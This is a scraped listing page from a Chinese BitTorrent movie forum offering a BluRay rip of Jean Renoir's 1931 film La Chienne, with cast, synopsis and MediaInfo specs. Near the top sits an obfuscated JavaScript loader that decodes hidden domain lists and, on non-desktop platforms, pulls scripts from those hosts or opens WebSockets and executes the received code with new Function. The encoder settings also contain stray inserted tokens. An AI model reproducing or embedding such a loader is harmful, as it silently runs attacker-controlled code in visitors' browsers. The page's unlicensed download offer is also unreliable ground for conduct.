母狗[中文字幕].La.chienne.1931.1080p.BluRay.x264.FLAC.1.0-迅雷下载 10.19GB

版主小s 21天前 671

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 母狗 / The Bitch / 娼妓

◎片 名 La Chienne

◎年 代 1931

◎产 地 法国

◎类 别 剧情

◎语 言 法语

◎上映日期 1931-12-30

◎IMDb评分 7.6/10 from 3754 users

◎IMDb链接 https://www.imdb.com/title/tt0021739

◎豆瓣评分 7.8/10 from 709 users

◎豆瓣链接 https://movie.douban.com/subject/1306486/

◎片 长 91 分钟

◎导 演 让·雷诺阿 Jean Renoir

◎编 剧 让·雷诺阿 Jean Renoir

◎主 演 米歇尔·西蒙 Michel Simon

贾妮·马雷塞 Janie Marèse

乔治·弗拉芒 Georges Flamant

罗歇·加亚尔 Roger Gaillard

亚历山大·里尼奥 Alexandre Rignault

克里斯蒂安·阿让蒂 Christian Argentin

马克斯·达尔班 Max Dalban

亨利·吉索尔 Henri Guisol

让·格雷特 Jean Gehret

◎标 签 让·雷诺阿 | 法国 | 法国电影 | 诗意现实主义 | 1931 | 1930s | JeanRenoir | Jean_Renoir

◎简 介

本片主角是一个老实的银行职员,同妻子的感情不融洽,他还是一个业余画家。后来偶然结识了一个名妓女,受到她的勾引。为了满足她的要求,甚至撬了老板的保险柜。在一次争执中职员失手杀了盘剥他的妓女并只身流浪街头。尽管如此,他还是尽力帮助一个贫困的少女,直到他本人被捕判刑。

  1. General

  2. Unique ID : 57670029168499277360217166539207004872 (0x2B62D7F69FAE349C404CB8FCB548D2C8)

  3. Complete name : La.chienne.1931.1080p.BluRay.x264.FLAC.1.0-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.2 GiB

  7. Duration : 1 h 36 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 15.2 Mb/s

  10. Movie name : La chienne 1931

  11. Encoded date : UTC 2021-07-04 05:23:15

  12. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : AVC

  19. Format/Info : Advanced Video Codec

  20. Format profile : [email protected]

  21. Format settings : CABAC / 4 Ref Frames

  22. Format settings, CABAC : Yes

  23. Format settings, Reference frames : 4 frames

  24. Codec ID : V_MPEG4/ISO/AVC

  25. Duration : 1 h 36 min

  26. Bit rate : 14.6 Mb/s

  27. Width : 1 302 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 1.206

  30. Frame rate mode : Constant

  31. Frame rate : 23.976 (24000/1001/53354) FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.434

  37. Stream size : 9.83 GiB (97%)

  38. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=34 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.5000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.60 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  40. Language : English

  41. Default : Yes

  42. Forced : No


  43. Audio

  44. ID : 2

  45. Format : FLAC

  46. Format/Info : Free Lossless Audio Codec

  47. Codec ID : A_FLAC

  48. Duration : 1 h 36 min

  49. Bit rate mode : Variable

  50. Bit rate : 479 kb/s

  51. Channel(s) : 1 channel

  52. Channel layout : C

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 11.719 FPS (4096 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 329 MiB (3%)

  58. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  59. Language : French

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4609 (0x1201)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 33 min

  70. Bit rate : 24.5 kb/s

  71. Count of elements : 1363

  72. Stream size : 16.5 MiB (0%)

  73. Language : Chinese

  74. Default : Yes

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4610 (0x1202)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 33 min

  85. Bit rate : 24.8 kb/s

  86. Count of elements : 1363

  87. Stream size : 16.6 MiB (0%)

  88. Language : Chinese

  89. Default : Yes

  90. Forced : No

  91. Original source medium : Blu-ray


  92. Text #3

  93. ID : 5

  94. ID in the original source medium : 4611 (0x1203)

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 32 min

  100. Bit rate : 28.6 kb/s

  101. Count of elements : 2068

  102. Stream size : 18.9 MiB (0%)

  103. Language : French

  104. Default : Yes

  105. Forced : No

  106. Original source medium : Blu-ray


  107. Text #4

  108. ID : 6

  109. ID in the original source medium : 4608 (0x1200)

  110. Format : PGS

  111. Muxing mode : zlib

  112. Codec ID : S_HDMV/PGS

  113. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  114. Duration : 1 h 34 min

  115. Bit rate : 41.2 kb/s

  116. Count of elements : 2184

  117. Stream size : 27.9 MiB (0%)

  118. Language : English

  119. Default : Yes

  120. Forced : No

  121. Original source medium : Blu-ray


  122. Menu

  123. 00:00:00.000 : Chapter 01

  124. 00:04:08.248 : Chapter 02

  125. 00:07:29.699 : Chapter 03

  126. 00:13:46.659 : Chapter 04

  127. 00:18:30.109 : Chapter 05

  128. 00:23:03.382 : Chapter 06

  129. 00:31:35.602 : Chapter 07

  130. 00:39:09.347 : Chapter 08

  131. 00:44:31.794 : Chapter 09

  132. 00:48:29.740 : Chapter 10

  133. 00:55:14.936 : Chapter 11

  134. 01:01:24.180 : Chapter 12

  135. 01:07:50.232 : Chapter 13

  136. 01:15:50.546 : Chapter 14

  137. 01:17:51.083 : Chapter 15

  138. 01:25:57.152 : Chapter 16

  139. 01:31:23.352 : Chapter 17




此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回